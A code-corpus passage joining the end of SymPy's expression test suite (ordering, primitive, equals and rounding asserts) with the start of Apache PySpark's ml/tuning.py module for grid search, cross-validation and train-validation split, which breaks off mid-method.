assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [1, 2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [{x: -y}, {x: y}]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [set([1]), set([1, 2])]
assert sorted(exprs, key=default_sort_key) == exprs
def test_as_ordered_factors():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_factors() == [x]
assert (2*x*x**n*sin(x)*cos(x)).as_ordered_factors() \
== [Integer(2), x, x**n, sin(x), cos(x)]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Mul(*args)
assert expr.as_ordered_factors() == args
A, B = symbols('A,B', commutative=False)
assert (A*B).as_ordered_factors() == [A, B]
assert (B*A).as_ordered_factors() == [B, A]
def test_as_ordered_terms():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_terms() == [x]
assert (sin(x)**2*cos(x) + sin(x)*cos(x)**2 + 1).as_ordered_terms() \
== [sin(x)**2*cos(x), sin(x)*cos(x)**2, 1]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Add(*args)
assert expr.as_ordered_terms() == args
assert (1 + 4*sqrt(3)*pi*x).as_ordered_terms() == [4*pi*x*sqrt(3), 1]
assert ( 2 + 3*I).as_ordered_terms() == [2, 3*I]
assert (-2 + 3*I).as_ordered_terms() == [-2, 3*I]
assert ( 2 - 3*I).as_ordered_terms() == [2, -3*I]
assert (-2 - 3*I).as_ordered_terms() == [-2, -3*I]
assert ( 4 + 3*I).as_ordered_terms() == [4, 3*I]
assert (-4 + 3*I).as_ordered_terms() == [-4, 3*I]
assert ( 4 - 3*I).as_ordered_terms() == [4, -3*I]
assert (-4 - 3*I).as_ordered_terms() == [-4, -3*I]
f = x**2*y**2 + x*y**4 + y + 2
assert f.as_ordered_terms(order="lex") == [x**2*y**2, x*y**4, y, 2]
assert f.as_ordered_terms(order="grlex") == [x*y**4, x**2*y**2, y, 2]
assert f.as_ordered_terms(order="rev-lex") == [2, y, x*y**4, x**2*y**2]
assert f.as_ordered_terms(order="rev-grlex") == [2, y, x**2*y**2, x*y**4]
def test_sort_key_atomic_expr():
from sympy.physics.units import m, s
assert sorted([-m, s], key=lambda arg: arg.sort_key()) == [-m, s]
def test_issue_1100():
# first subs and limit gives NaN
a = x/y
assert a._eval_interval(x, 0, oo)._eval_interval(y, oo, 0) is S.NaN
# second subs and limit gives NaN
assert a._eval_interval(x, 0, oo)._eval_interval(y, 0, oo) is S.NaN
# difference gives S.NaN
a = x - y
assert a._eval_interval(x, 1, oo)._eval_interval(y, oo, 1) is S.NaN
raises(ValueError, lambda: x._eval_interval(x, None, None))
def test_primitive():
assert (3*(x + 1)**2).primitive() == (3, (x + 1)**2)
assert (6*x + 2).primitive() == (2, 3*x + 1)
assert (x/2 + 3).primitive() == (S(1)/2, x + 6)
eq = (6*x + 2)*(x/2 + 3)
assert eq.primitive()[0] == 1
eq = (2 + 2*x)**2
assert eq.primitive()[0] == 1
assert (4.0*x).primitive() == (1, 4.0*x)
assert (4.0*x + y/2).primitive() == (S.Half, 8.0*x + y)
assert (-2*x).primitive() == (2, -x)
assert Add(5*z/7, 0.5*x, 3*y/2, evaluate=False).primitive() == \
(S(1)/14, 7.0*x + 21*y + 10*z)
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).primitive() == \
(S(1)/3, i + x)
assert (S.Infinity + 2*x/3 + 4*y/7).primitive() == \
(S(1)/21, 14*x + 12*y + oo)
assert S.Zero.primitive() == (S.One, S.Zero)
def test_issue_2744():
a = 1 + x
assert (2*a).extract_multiplicatively(a) == 2
assert (4*a).extract_multiplicatively(2*a) == 2
assert ((3*a)*(2*a)).extract_multiplicatively(a) == 6*a
def test_is_constant():
from sympy.solvers.solvers import checksol
Sum(x, (x, 1, 10)).is_constant() is True
Sum(x, (x, 1, n)).is_constant() is False
Sum(x, (x, 1, n)).is_constant(y) is True
Sum(x, (x, 1, n)).is_constant(n) is False
Sum(x, (x, 1, n)).is_constant(x) is True
eq = a*cos(x)**2 + a*sin(x)**2 - a
eq.is_constant() is True
assert eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
assert x.is_constant() is False
assert x.is_constant(y) is True
assert checksol(x, x, Sum(x, (x, 1, n))) is False
assert checksol(x, x, Sum(x, (x, 1, n))) is False
f = Function('f')
assert checksol(x, x, f(x)) is False
p = symbols('p', positive=True)
assert Pow(x, S(0), evaluate=False).is_constant() is True # == 1
assert Pow(S(0), x, evaluate=False).is_constant() is False # == 0 or 1
assert Pow(S(0), p, evaluate=False).is_constant() is True # == 1
assert (2**x).is_constant() is False
assert Pow(S(2), S(3), evaluate=False).is_constant() is True
z1, z2 = symbols('z1 z2', zero=True)
assert (z1 + 2*z2).is_constant() is True
assert meter.is_constant() is True
assert (3*meter).is_constant() is True
assert (x*meter).is_constant() is False
def test_equals():
assert (-3 - sqrt(5) + (-sqrt(10)/2 - sqrt(2)/2)**2).equals(0)
assert (x**2 - 1).equals((x + 1)*(x - 1))
assert (cos(x)**2 + sin(x)**2).equals(1)
assert (a*cos(x)**2 + a*sin(x)**2).equals(a)
r = sqrt(2)
assert (-1/(r + r*x) + 1/r/(1 + x)).equals(0)
assert factorial(x + 1).equals((x + 1)*factorial(x))
assert sqrt(3).equals(2*sqrt(3)) is False
assert (sqrt(5)*sqrt(3)).equals(sqrt(3)) is False
assert (sqrt(5) + sqrt(3)).equals(0) is False
assert (sqrt(5) + pi).equals(0) is False
assert meter.equals(0) is False
assert (3*meter**2).equals(0) is False
eq = -(-1)**(S(3)/4)*6**(S(1)/4) + (-6)**(S(1)/4)*I
if eq != 0: # if canonicalization makes this zero, skip the test
assert eq.equals(0)
assert sqrt(x).equals(0) is False
# from integrate(x*sqrt(1+2*x), x);
# diff is zero only when assumptions allow
i = 2*sqrt(2)*x**(S(5)/2)*(1 + 1/(2*x))**(S(5)/2)/5 + \
2*sqrt(2)*x**(S(3)/2)*(1 + 1/(2*x))**(S(5)/2)/(-6 - 3/x)
ans = sqrt(2*x + 1)*(6*x**2 + x - 1)/15
diff = i - ans
assert diff.equals(0) is False
assert diff.subs(x, -S.Half/2) == 7*sqrt(2)/120
# there are regions for x for which the expression is True, for
# example, when x < -1/2 or x > 0 the expression is zero
p = Symbol('p', positive=True)
assert diff.subs(x, p).equals(0) is True
assert diff.subs(x, -1).equals(0) is True
# prove via minimal_polynomial or self-consistency
eq = sqrt(1 + sqrt(3)) + sqrt(3 + 3*sqrt(3)) - sqrt(10 + 6*sqrt(3))
assert eq.equals(0)
q = 3**Rational(1, 3) + 3
p = expand(q**3)**Rational(1, 3)
assert (p - q).equals(0)
# issue 3730
# eq = q*x + q/4 + x**4 + x**3 + 2*x**2 - S(1)/3
# z = eq.subs(x, solve(eq, x)[0])
q = symbols('q')
z = (q*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12)/2 - sqrt((2*q - S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/6)/2 - S(1)/4) + q/4 + (-sqrt(-2*(-(q
- S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q
- S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**4 + (-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**3 + 2*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**2 - S(1)/3)
assert z.equals(0)
def test_random():
from sympy import posify, lucas
assert posify(x)[0]._random() is not None
assert lucas(n)._random(2, -2, 0, -1, 1) is None
def test_round():
from sympy.abc import x
assert Float('0.1249999').round(2) == 0.12
d20 = 12345678901234567890
ans = S(d20).round(2)
assert ans.is_Float and ans == d20
ans = S(d20).round(-2)
assert ans.is_Float and ans == 12345678901234567900
assert S('1/7').round(4) == 0.1429
assert S('.[12345]').round(4) == 0.1235
assert S('.1349').round(2) == 0.13
n = S(12345)
ans = n.round()
assert ans.is_Float
assert ans == n
ans = n.round(1)
assert ans.is_Float
assert ans == n
ans = n.round(4)
assert ans.is_Float
assert ans == n
assert n.round(-1) == 12350
r = n.round(-4)
assert r == 10000
# in fact, it should equal many values since __eq__
# compares at equal precision
assert all(r == i for i in range(9984, 10049))
assert n.round(-5) == 0
assert (pi + sqrt(2)).round(2) == 4.56
assert (10*(pi + sqrt(2))).round(-1) == 50
raises(TypeError, lambda: round(x + 2, 2))
assert S(2.3).round(1) == 2.3
e = S(12.345).round(2)
assert e == round(12.345, 2)
assert type(e) is Float
assert (Float(.3, 3) + 2*pi).round() == 7
assert (Float(.3, 3) + 2*pi*100).round() == 629
assert (Float(.03, 3) + 2*pi/100).round(5) == 0.09283
assert (Float(.03, 3) + 2*pi/100).round(4) == 0.0928
assert (pi + 2*E*I).round() == 3 + 5*I
assert S.Zero.round() == 0
a = (Add(1, Float('1.' + '9'*27, ''), evaluate=0))
assert a.round(10) == Float('3.0000000000', '')
assert a.round(25) == Float('3.0000000000000000000000000', '')
assert a.round(26) == Float('3.00000000000000000000000000', '')
assert a.round(27) == Float('2.999999999999999999999999999', '')
assert a.round(30) == Float('2.999999999999999999999999999', '')
raises(TypeError, lambda: x.round())
# exact magnitude of 10
assert str(S(1).round()) == '1.'
assert str(S(100).round()) == '100.'
# applied to real and imaginary portions
assert (2*pi + E*I).round() == 6 + 3*I
assert (2*pi + I/10).round() == 6
assert (pi/10 + 2*I).round() == 2*I
# the lhs re and im parts are Float with dps of 2
# and those on the right have dps of 15 so they won't compare
# equal unless we use string or compare components (which will
# then coerce the floats to the same precision) or re-create
# the floats
assert str((pi/10 + E*I).round(2)) == '0.31 + 2.72*I'
assert (pi/10 + E*I).round(2).as_real_imag() == (0.31, 2.72)
assert (pi/10 + E*I).round(2) == Float(0.31, 2) + I*Float(2.72, 3)
# issue 3815
assert (I**(I + 3)).round(3) == Float('-0.208', '')*I
def test_extract_branch_factor():
assert exp_polar(2.0*I*pi).extract_branch_factor() == (1, 1)
def test_identity_removal():
assert Add.make_args(x + 0) == (x,)
assert Mul.make_args(x*1) == (x,)
def test_float_0():
assert Float(0.0) + 1 == Float(1.0)
@XFAIL
def test_float_0_fail():
assert Float(0.0)*x == Float(0.0)
assert (x + Float(0.0)).is_Add
def test_issue_3226():
ans = (b**2 + z**2 - (b*(a + b*t) + z*(c + t*z))**2/(
(a + b*t)**2 + (c + t*z)**2))/sqrt((a + b*t)**2 + (c + t*z)**2)
e = sqrt((a + b*t)**2 + (c + z*t)**2)
assert diff(e, t, 2) == ans
e.diff(t, 2) == ans
assert diff(e, t, 2, simplify=False) != ans
| bsd-3-clause |
nlalevee/spark | python/pyspark/ml/tuning.py | 6 | 26126 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import itertools
import numpy as np
from multiprocessing.pool import ThreadPool
from pyspark import since, keyword_only
from pyspark.ml import Estimator, Model
from pyspark.ml.common import _py2java
from pyspark.ml.param import Params, Param, TypeConverters
from pyspark.ml.param.shared import HasParallelism, HasSeed
from pyspark.ml.util import *
from pyspark.ml.wrapper import JavaParams
from pyspark.sql.functions import rand
__all__ = ['ParamGridBuilder', 'CrossValidator', 'CrossValidatorModel', 'TrainValidationSplit',
'TrainValidationSplitModel']
class ParamGridBuilder(object):
r"""
Builder for a param grid used in grid search-based model selection.
>>> from pyspark.ml.classification import LogisticRegression
>>> lr = LogisticRegression()
>>> output = ParamGridBuilder() \
... .baseOn({lr.labelCol: 'l'}) \
... .baseOn([lr.predictionCol, 'p']) \
... .addGrid(lr.regParam, [1.0, 2.0]) \
... .addGrid(lr.maxIter, [1, 5]) \
... .build()
>>> expected = [
... {lr.regParam: 1.0, lr.maxIter: 1, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 2.0, lr.maxIter: 1, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 1.0, lr.maxIter: 5, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 2.0, lr.maxIter: 5, lr.labelCol: 'l', lr.predictionCol: 'p'}]
>>> len(output) == len(expected)
True
>>> all([m in expected for m in output])
True
.. versionadded:: 1.4.0
"""
def __init__(self):
self._param_grid = {}
@since("1.4.0")
def addGrid(self, param, values):
"""
Sets the given parameters in this grid to fixed values.
"""
self._param_grid[param] = values
return self
@since("1.4.0")
def baseOn(self, *args):
"""
Sets the given parameters in this grid to fixed values.
Accepts either a parameter dictionary or a list of (parameter, value) pairs.
"""
if isinstance(args[0], dict):
self.baseOn(*args[0].items())
else:
for (param, value) in args:
self.addGrid(param, [value])
return self
@since("1.4.0")
def build(self):
"""
Builds and returns all combinations of parameters specified
by the param grid.
"""
keys = self._param_grid.keys()
grid_values = self._param_grid.values()
return [dict(zip(keys, prod)) for prod in itertools.product(*grid_values)]
class ValidatorParams(HasSeed):
"""
Common params for TrainValidationSplit and CrossValidator.
"""
estimator = Param(Params._dummy(), "estimator", "estimator to be cross-validated")
estimatorParamMaps = Param(Params._dummy(), "estimatorParamMaps", "estimator param maps")
evaluator = Param(
Params._dummy(), "evaluator",
"evaluator used to select hyper-parameters that maximize the validator metric")
def setEstimator(self, value):
"""
Sets the value of :py:attr:`estimator`.
"""
return self._set(estimator=value)
def getEstimator(self):
"""
Gets the value of estimator or its default value.
"""
return self.getOrDefault(self.estimator)
def setEstimatorParamMaps(self, value):
"""
Sets the value of :py:attr:`estimatorParamMaps`.
"""
return self._set(estimatorParamMaps=value)
def getEstimatorParamMaps(self):
"""
Gets the value of estimatorParamMaps or its default value.
"""
return self.getOrDefault(self.estimatorParamMaps)
def setEvaluator(self, value):
"""
Sets the value of :py:attr:`evaluator`.
"""
return self._set(evaluator=value)
def getEvaluator(self):
"""
Gets the value of evaluator or its default value.
"""
return self.getOrDefault(self.evaluator)
@classmethod
def _from_java_impl(cls, java_stage):
"""
Return Python estimator, estimatorParamMaps, and evaluator from a Java ValidatorParams.
"""
# Load information from java_stage to the instance.
estimator = JavaParams._from_java(java_stage.getEstimator())
evaluator = JavaParams._from_java(java_stage.getEvaluator())
epms = [estimator._transfer_param_map_from_java(epm)
for epm in java_stage.getEstimatorParamMaps()]
return estimator, epms, evaluator
def _to_java_impl(self):
"""
Return Java estimator, estimatorParamMaps, and evaluator from this Python instance.
"""
gateway = SparkContext._gateway
cls = SparkContext._jvm.org.apache.spark.ml.param.ParamMap
java_epms = gateway.new_array(cls, len(self.getEstimatorParamMaps()))
for idx, epm in enumerate(self.getEstimatorParamMaps()):
java_epms[idx] = self.getEstimator()._transfer_param_map_to_java(epm)
java_estimator = self.getEstimator()._to_java()
java_evaluator = self.getEvaluator()._to_java()
return java_estimator, java_epms, java_evaluator
class CrossValidator(Estimator, ValidatorParams, HasParallelism, MLReadable, MLWritable):
"""
K-fold cross validation performs model selection by splitting the dataset into a set of
non-overlapping randomly partitioned folds which are used as separate training and test datasets
e.g., with k=3 folds, K-fold cross validation will generate 3 (training, test) dataset pairs,
each of which uses 2/3 of the data for training and 1/3 for testing. Each fold is used as the
test set exactly once.
>>> from pyspark.ml.classification import LogisticRegression
>>> from pyspark.ml.evaluation import BinaryClassificationEvaluator
>>> from pyspark.ml.linalg import Vectors
>>> dataset = spark.createDataFrame(
... [(Vectors.dense([0.0]), 0.0),
... (Vectors.dense([0.4]), 1.0),
... (Vectors.dense([0.5]), 0.0),
... (Vectors.dense([0.6]), 1.0),
... (Vectors.dense([1.0]), 1.0)] * 10,
... ["features", "label"])
>>> lr = LogisticRegression()
>>> grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
>>> evaluator = BinaryClassificationEvaluator()
>>> cv = CrossValidator(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator,
... parallelism=2)
>>> cvModel = cv.fit(dataset)
>>> cvModel.avgMetrics[0]
0.5
>>> evaluator.evaluate(cvModel.transform(dataset))
0.8333...
.. versionadded:: 1.4.0
"""
numFolds = Param(Params._dummy(), "numFolds", "number of folds for cross validation",
typeConverter=TypeConverters.toInt)
@keyword_only
def __init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,
seed=None, parallelism=1):
"""
__init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,\
seed=None, parallelism=1)
"""
super(CrossValidator, self).__init__()
self._setDefault(numFolds=3, parallelism=1)
kwargs = self._input_kwargs
self._set(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,
seed=None, parallelism=1):
"""
setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,\
seed=None, parallelism=1):
Sets params for cross validator.
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
@since("1.4.0")
def setNumFolds(self, value):
"""
Sets the value of :py:attr:`numFolds`.
"""
return self._set(numFolds=value)
@since("1.4.0")
def getNumFolds(self):
"""
Gets the value of numFolds or its default value.
"""
return self.getOrDefault(self.numFolds)
def _fit(self, dataset):
est = self.getOrDefault(self.estimator)
epm = self.getOrDefault(self.estimatorParamMaps)
numModels = len(epm)
eva = self.getOrDefault(self.evaluator)
nFolds = self.getOrDefault(self.numFolds)
seed = self.getOrDefault(self.seed)
h = 1.0 / nFolds
randCol = self.uid + "_rand"
df = dataset.select("*", rand(seed).alias(randCol))
metrics = [0.0] * numModels
pool = ThreadPool(processes=min(self.getParallelism(), numModels))
for i in range(nFolds):
validateLB = i * h
validateUB = (i + 1) * h
condition = (df[randCol] >= validateLB) & (df[randCol] < validateUB)
validation = df.filter(condition).cache()
train = df.filter(~condition).cache()
def singleTrain(paramMap):
model = est.fit(train, paramMap)
# TODO: duplicate evaluator to take extra params from input
metric = eva.evaluate(model.transform(validation, paramMap))
return metric
currentFoldMetrics = pool.map(singleTrain, epm)
for j in range(numModels):
metrics[j] += (currentFoldMetrics[j] / nFolds)
validation.unpersist()
train.unpersist()
if eva.isLargerBetter():
bestIndex = np.argmax(metrics)
else:
bestIndex = np.argmin(metrics)
bestModel = est.fit(dataset, epm[bestIndex])
return self._copyValues(CrossValidatorModel(bestModel, metrics))
@since("1.4.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies creates a deep copy of
the embedded paramMap, and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newCV = Params.copy(self, extra)
if self.isSet(self.estimator):
newCV.setEstimator(self.getEstimator().copy(extra))
# estimatorParamMaps remain the same
if self.isSet(self.evaluator):
newCV.setEvaluator(self.getEvaluator().copy(extra))
return newCV
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java CrossValidator, create and return a Python wrapper of it.
Used for ML persistence.
"""
estimator, epms, evaluator = super(CrossValidator, cls)._from_java_impl(java_stage)
numFolds = java_stage.getNumFolds()
seed = java_stage.getSeed()
parallelism = java_stage.getParallelism()
# Create a new instance of this stage.
py_stage = cls(estimator=estimator, estimatorParamMaps=epms, evaluator=evaluator,
numFolds=numFolds, seed=seed, parallelism=parallelism)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java CrossValidator. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
estimator, epms, evaluator = super(CrossValidator, self)._to_java_impl()
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.CrossValidator", self.uid)
_java_obj.setEstimatorParamMaps(epms)
_java_obj.setEvaluator(evaluator)
_java_obj.setEstimator(estimator)
_java_obj.setSeed(self.getSeed())
_java_obj.setNumFolds(self.getNumFolds())
_java_obj.setParallelism(self.getParallelism())
return _java_obj
class CrossValidatorModel(Model, ValidatorParams, MLReadable, MLWritable):
"""
CrossValidatorModel contains the model with the highest average cross-validation
metric across folds and uses this model to transform input data. CrossValidatorModel
also tracks the metrics for each param map evaluated.
.. versionadded:: 1.4.0
"""
def __init__(self, bestModel, avgMetrics=[]):
super(CrossValidatorModel, self).__init__()
#: best model from cross validation
self.bestModel = bestModel
#: Average cross-validation metrics for each paramMap in
#: CrossValidator.estimatorParamMaps, in the corresponding order.
self.avgMetrics = avgMetrics
def _transform(self, dataset):
return self.bestModel.transform(dataset)
@since("1.4.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies the underlying bestModel,
creates a deep copy of the embedded paramMap, and
copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
bestModel = self.bestModel.copy(extra)
avgMetrics = self.avgMetrics
return CrossValidatorModel(bestModel, avgMetrics)
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java CrossValidatorModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
bestModel = JavaParams._from_java(java_stage.bestModel())
estimator, epms, evaluator = super(CrossValidatorModel, cls)._from_java_impl(java_stage)
py_stage = cls(bestModel=bestModel).setEstimator(estimator)
py_stage = py_stage.setEstimatorParamMaps(epms).setEvaluator(evaluator)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java CrossValidatorModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
sc = SparkContext._active_spark_context
# TODO: persist average metrics as well
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.CrossValidatorModel",
self.uid,
self.bestModel._to_java(),
_py2java(sc, []))
estimator, epms, evaluator = super(CrossValidatorModel, self)._to_java_impl()
_java_obj.set("evaluator", evaluator)
_java_obj.set("estimator", estimator)
_java_obj.set("estimatorParamMaps", epms)
return _java_obj
class TrainValidationSplit(Estimator, ValidatorParams, HasParallelism, MLReadable, MLWritable):
"""
.. note:: Experimental
Validation for hyper-parameter tuning. Randomly splits the input dataset into train and
validation sets, and uses evaluation metric on the validation set to select the best model.
Similar to :class:`CrossValidator`, but only splits the set once.
>>> from pyspark.ml.classification import LogisticRegression
>>> from pyspark.ml.evaluation import BinaryClassificationEvaluator
>>> from pyspark.ml.linalg import Vectors
>>> dataset = spark.createDataFrame(
... [(Vectors.dense([0.0]), 0.0),
... (Vectors.dense([0.4]), 1.0),
... (Vectors.dense([0.5]), 0.0),
... (Vectors.dense([0.6]), 1.0),
... (Vectors.dense([1.0]), 1.0)] * 10,
... ["features", "label"])
>>> lr = LogisticRegression()
>>> grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
>>> evaluator = BinaryClassificationEvaluator()
>>> tvs = TrainValidationSplit(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator,
... parallelism=2)
>>> tvsModel = tvs.fit(dataset)
>>> evaluator.evaluate(tvsModel.transform(dataset))
0.8333...
.. versionadded:: 2.0.0
"""
trainRatio = Param(Params._dummy(), "trainRatio", "Param for ratio between train and\
validation data. Must be between 0 and 1.", typeConverter=TypeConverters.toFloat)
@keyword_only
def __init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,
parallelism=1, seed=None):
"""
__init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,\
parallelism=1, seed=None)
"""
super(TrainValidationSplit, self).__init__()
self._setDefault(trainRatio=0.75, parallelism=1)
kwargs = self._input_kwargs
self._set(**kwargs)
@since("2.0.0")
@keyword_only
def setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,
parallelism=1, seed=None):
"""
setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,\
parallelism=1, seed=None):
Sets params for the train validation split.
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
@since("2.0.0")
def setTrainRatio(self, value):
"""
Sets the value of :py:attr:`trainRatio`.
"""
return self._set(trainRatio=value)
@since("2.0.0")
def getTrainRatio(self):
"""
Gets the value of trainRatio or its default value.
"""
return self.getOrDefault(self.trainRatio)
def _fit(self, dataset):
est = self.getOrDefault(self.estimator)
epm = self.getOrDefault(self.estimatorParamMaps)
numModels = len(epm)
eva = self.getOrDefault(self.evaluator)
tRatio = self.getOrDefault(self.trainRatio)
seed = self.getOrDefault(self.seed)
randCol = self.uid + "_rand"
df = dataset.select("*", rand(seed).alias(randCol))
condition = (df[randCol] >= tRatio)
validation = df.filter(condition).cache()
train = df.filter(~condition).cache()
def singleTrain(paramMap):
model = est.fit(train, paramMap)
metric = eva.evaluate(model.transform(validation, paramMap))
return metric
pool = ThreadPool(processes=min(self.getParallelism(), numModels))
metrics = pool.map(singleTrain, epm)
train.unpersist()
validation.unpersist()
if eva.isLargerBetter():
bestIndex = np.argmax(metrics)
else:
bestIndex = np.argmin(metrics)
bestModel = est.fit(dataset, epm[bestIndex])
return self._copyValues(TrainValidationSplitModel(bestModel, metrics))
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies creates a deep copy of
the embedded paramMap, and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newTVS = Params.copy(self, extra)
if self.isSet(self.estimator):
newTVS.setEstimator(self.getEstimator().copy(extra))
# estimatorParamMaps remain the same
if self.isSet(self.evaluator):
newTVS.setEvaluator(self.getEvaluator().copy(extra))
return newTVS
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java TrainValidationSplit, create and return a Python wrapper of it.
Used for ML persistence.
"""
estimator, epms, evaluator = super(TrainValidationSplit, cls)._from_java_impl(java_stage)
trainRatio = java_stage.getTrainRatio()
seed = java_stage.getSeed()
parallelism = java_stage.getParallelism()
# Create a new instance of this stage.
py_stage = cls(estimator=estimator, estimatorParamMaps=epms, evaluator=evaluator,
trainRatio=trainRatio, seed=seed, parallelism=parallelism)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java TrainValidationSplit. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
estimator, epms, evaluator = super(TrainValidationSplit, self)._to_java_impl()
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.TrainValidationSplit",
self.uid)
_java_obj.setEstimatorParamMaps(epms)
_java_obj.setEvaluator(evaluator)
_java_obj.setEstimator(estimator)
_java_obj.setTrainRatio(self.getTrainRatio())
_java_obj.setSeed(self.getSeed())
_java_obj.setParallelism(self.getParallelism())
return _java_obj
class TrainValidationSplitModel(Model, ValidatorParams, MLReadable, MLWritable):
"""
.. note:: Experimental
Model from train validation split.
.. versionadded:: 2.0.0
"""
def __init__(self, bestModel, validationMetrics=[]):
super(TrainValidationSplitModel, self).__init__()
#: best model from cross validation
self.bestModel = bestModel
#: evaluated validation metrics
self.validationMetrics = validationMetrics
def _transform(self, dataset):
return self.bestModel.transform(dataset)
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies the underlying bestModel,
creates a deep copy of the embedded paramMap, and
copies the embedded and extra parameters over.
And, this creates a shallow copy of the validationMetrics.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
bestModel = self.bestModel.copy(extra)
validationMetrics = list(self.validationMetrics)
return TrainValidationSplitModel(bestModel, validationMetrics)
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java TrainValidationSplitModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
